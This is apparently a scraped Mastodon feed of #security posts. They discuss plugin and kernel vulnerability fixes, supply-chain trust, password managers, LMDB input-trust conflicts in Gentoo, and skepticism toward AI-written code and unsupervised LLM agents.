@matthiasott@mastodon.social#Webmention for Craft v1.3.0 is out 🎉 – first in a short series of #security releases. 🔒
Fixes a stored XSS vulnerability in author/entry URLs, adds per-IP rate limits, and failure-backoff to harden the public endpoint against abuse.
Upgrade recommended!
@mgorny@social.treehouse.systemsFun post pointed out by Werner Koch on the GPG "post-quantum defaults" thread:
#cryptography #QuantumCryptography #security
@mgorny@social.treehouse.systemsEveryone loves jeering at vibecoded #GitHub being down all the time. Yet for some reason people still neglect to question making #Microsoft the primary guarantor of their software's supply chain #security. And the whole attestation nonsense that doesn't really protect against the most likely attack vectors.
@kubikpixel@chaos.social«Security: This library has not undergone any third-party security audit. Usage is at own risk.»
If something like this is written on a code library, the confidence in your security is much higher than if commercial blenders want to advertise absolute IT security and there are the safest — especially when the commercial goals still list ratings in this way.
#security
@frankel@mastodon.top
@crepererum@mastodon.online
@frankstohl@mastodon.social
@kaiengert@mastodon.socialPlease help with testing a new
#Thunderbird #Security feature: Unobtrusive Signatures, a novel mechanism for digitally signing email, currently implemented for #OpenPGP.
It avoids the u…
@vosje62@mastodon.nl
@vague@social.linux.pizza
@UP8@mastodon.social🤦🏿♀️ Zero Knowledge (About) Encryption: A Comparative Security Analysis of Three Cloud-based Password Managers
#security
@cyrevolt@mastodon.social
@almad@fosstodon.orgOh wow. I guess it's "lazy and smart" in a way (and only gives you three attempts at loading, then 401)
#security
@usul@piaille.frIf the browser maker you are using is able to pull off something similar than what's described in this video, then it's a safe browser to use.
https://www.youtube.com/watch?app=desktop&v=YQEq5s4SRxY
@eingfoan@infosec.exchangeIs there a guide how to integrate #SIEM systems and #VideoSuvailance systems vor General alarming systems for having physical and Cyber #security in one Palace (if company is not that large ...…
@mgorny@social.treehouse.systemsThe state of #security these days: #Python #virtualenv package now includes SHA256 sums of their bundled wheels, declaring that it protects against "supply-chain compromise". Because obviously there are so many attack vectors that permit you to alter a .whl file but not the .py file in the same directory.
No, I'm not saying verifying checksum makes no sense, because indeed it can save some pain if fs is damaged somehow. However, calling this a "security" feature is a misnomer at best, and openly giving people false sense of security at worst.
@chris@mstdn.chrisalemany.caWow, so 1Password has increased its already expensive services. I have only used it for work/volunteer related stuff. I've been using Apple's Keychain and now Passwords App for years.
If you're on a Mac/iOS system and want to switch, 9to5 has a good run down on how to export your 1Password database and bring it into Passwords.
if you've never used a Password Manager, you really really should.
#Security #Passwords #Apple #1Password #PasswordManager
https://9to5mac.com/2026/02/25/heres-how-to-switch-from-1password-to-apple-passwords/?utm_source=dlvr.it&utm_medium=mastodon
@mgorny@social.treehouse.systems#Python #cryptography library (yes, the one that criticizes everything and everyone) is now vibecoded. Our future is truly bright!
Noticed because apparently "Claude" wrote a test that OOM-ed my system. But hey, #RustLang protects against memory errors, so it's fine to vibecode your security critical components.
#security #AI #LLM #NoAI #NoLLM
@mgorny@social.treehouse.systemsSo you read about #CopyFail, and are like… owww, shit. But then you see that it was responsibly disclosed after being fixed in main, we had releases since, they went stable in #Gentoo (over other #security fixes), so we should be good, right?
Except that it turns out that after it has been fixed in mainline, nobody bothered actually backporting the fix to all the LTS branches. And it doesn't apply cleanly (#Gentoo #Linux
@mgorny@social.treehouse.systemsGreg Kroah-Hartman: "If you look there are thousands of unfixed CVEs in the older LTS kernels right now, and if distros or users that rely on those older branches wish to see those resolved, they need to provide working backports to us to apply, as our first attempt did not work (which is why they are unfixed in those branches.)"
Really asking for a "Pray tell us", given that nobody actually bothered disclosing the problem to downstreams and that the commit message was hiding it.
Either way, apparently the great LLM-backed patch backporting process that #NVidia is so proud of doesn't really work. Upstream doesn't really care about #LTS branches, and they should be considered insecure by default.
#Gentoo #Linux #CopyFail #security
@frankstohl@mastodon.social @mgorny@social.treehouse.systemsProper #security nightmare time.
#LMDB is a database that's designed to operate on trusted input. Upstream has historically rejected all bug reports regarding problems with malformed input.
Py-LMDB project provides #Python bindings to LMDB that are normally built against bundled LMDB. Someone recently started mass-filing "untrusted input" vulnerabilities against py-lmdb, and py-lmdb started #slop - coding fixes to their bundled LMDB. Of course, nobody even bothered reporting most of these bugs upstream, and the one that I've seen reported was rejected as "don't do that".
Py-LMDB supports building against system LMDB, and #Gentoo was doing that so far. However, now we are facing a problem: system LMDB operates under the assumption that it is working on trusted input, while py-lmdb (and its bundled LMDB) operates under the assumption that it may be working with untrusted input. The guarantees no longer align.
If we continue to use system LMDB (and skip all the added slop tests that literally cause Python to crash), then Gentoo's py-lmdb package will now have different input expectations than upstream py-lmdb. And of course we can't just remove that crap because someone added exactly one package (TorchVision, i.e. part of the plagiarism machine suite) depending on it.
https://bugs.gentoo.org/971352
@mgorny@social.treehouse.systemsModern use of LLMs often involves giving them access to the local system: to read and write your project files, and to execute arbitrary commands, often unsupervised. So aren't people worried about a harness just doing what a remote #LLM tells it to do?
I think a statement I've heard lately summarizes the mindset well. It went something along the lines "I can't give you 100% guarantee, but I've noticed that LLMs are very good at following instructions, and they're getting better and better, so I don't worry about that anymore".
Like, it is completely fine to introduce a humongous security hole, because the probability that a model will *accidentally* do something horrible is decreasing.
#AI #NoAI #NoLLM #security
